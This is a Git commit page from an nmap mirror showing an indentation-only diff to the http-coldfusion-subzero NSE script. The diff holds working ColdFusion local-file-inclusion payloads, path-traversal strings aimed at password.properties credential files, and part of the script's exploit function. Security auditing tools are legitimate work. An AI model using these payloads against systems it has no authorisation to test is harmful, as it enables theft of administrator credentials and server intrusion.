PenTest/nmap
1
0
Fork 0
mirror of https://github.com/nmap/nmap.git synced 2025-12-21 15:09:02 +00:00
Code Issues Projects Releases Wiki Activity

Indentation fixes.

Browse Source
This commit is contained in:
henri
2013-05-10 07:59:43 +00:00
parent 36fefe7467
commit 76db6d8de3
1 changed files with 13 additions and 11 deletions
Download Patch File Download Diff File Expand all files Collapse all files

24
scripts/http-coldfusion-subzero.nse
View File

@@ -43,16 +43,18 @@ local PATH_PAYLOAD = "CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attrib
local IMG_PAYLOAD = "CFIDE/administrator/images/loginbackground.jpg" local IMG_PAYLOAD = "CFIDE/administrator/images/loginbackground.jpg"
local LFI_PAYLOAD_FRAG_1 = "CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=" local LFI_PAYLOAD_FRAG_1 = "CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename="
local LFI_PAYLOAD_FRAG_2 = "&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp" local LFI_PAYLOAD_FRAG_2 = "&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp"
local CREDENTIALS_PAYLOADS = {"../../lib/password.properties", local CREDENTIALS_PAYLOADS = {
'..\\..\\lib\\password.properties', "../../lib/password.properties",
'..\\..\\..\\..\\..\\..\\..\\..\\..\\ColdFusion10\\lib\\password.properties', "..\\..\\lib\\password.properties",
"..\\..\\..\\..\\..\\..\\..\\..\\..\\ColdFusion10\\cfusion\\lib\\password.properties", "..\\..\\..\\..\\..\\..\\..\\..\\..\\ColdFusion10\\lib\\password.properties",
"..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\JRun4\\servers\\cfusion\\cfusion-ear\\cfusion-war\\WEB-INF\\cfusion\\lib\\password.properties", "..\\..\\..\\..\\..\\..\\..\\..\\..\\ColdFusion10\\cfusion\\lib\\password.properties",
"..\\..\\..\\..\\..\\..\\..\\..\\..\\ColdFusion9\\lib\\password.properties", "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\JRun4\\servers\\cfusion\\cfusion-ear\\cfusion-war\\WEB-INF\\cfusion\\lib\\password.properties",
"..\\..\\..\\..\\..\\..\\..\\..\\..\\ColdFusion9\\cfusion\\lib\\password.properties", "..\\..\\..\\..\\..\\..\\..\\..\\..\\ColdFusion9\\lib\\password.properties",
"../../../../../../../../../opt/coldfusion10/cfusion/lib/password.properties", "..\\..\\..\\..\\..\\..\\..\\..\\..\\ColdFusion9\\cfusion\\lib\\password.properties",
"../../../../../../../../../opt/coldfusion/cfusion/lib/password.properties", "../../../../../../../../../opt/coldfusion10/cfusion/lib/password.properties",
"../../../../../../../../../opt/coldfusion9/cfusion/lib/password.properties"} "../../../../../../../../../opt/coldfusion/cfusion/lib/password.properties",
"../../../../../../../../../opt/coldfusion9/cfusion/lib/password.properties"
}
--- ---
-- Extracts absolute path of installation by reading the ANALIZER_DIRECTORY value from the header 'set-cookie' -- Extracts absolute path of installation by reading the ANALIZER_DIRECTORY value from the header 'set-cookie'
@@ -102,7 +104,7 @@ local function exploit(host, port, basepath)
local req = http.get(host, port, basepath..LFI_PAYLOAD_FRAG_1..vector..LFI_PAYLOAD_FRAG_2) local req = http.get(host, port, basepath..LFI_PAYLOAD_FRAG_1..vector..LFI_PAYLOAD_FRAG_2)
if req.body and string.find(req.body, "encrypted=true") then if req.body and string.find(req.body, "encrypted=true") then
stdnse.print_debug(1, "%s: String pattern found. Exploitation worked with vector '%s'.", SCRIPT_NAME, vector) stdnse.print_debug(1, "%s: String pattern found. Exploitation worked with vector '%s'.", SCRIPT_NAME, vector)
return true, req.body return true, req.body
end end
end end
end end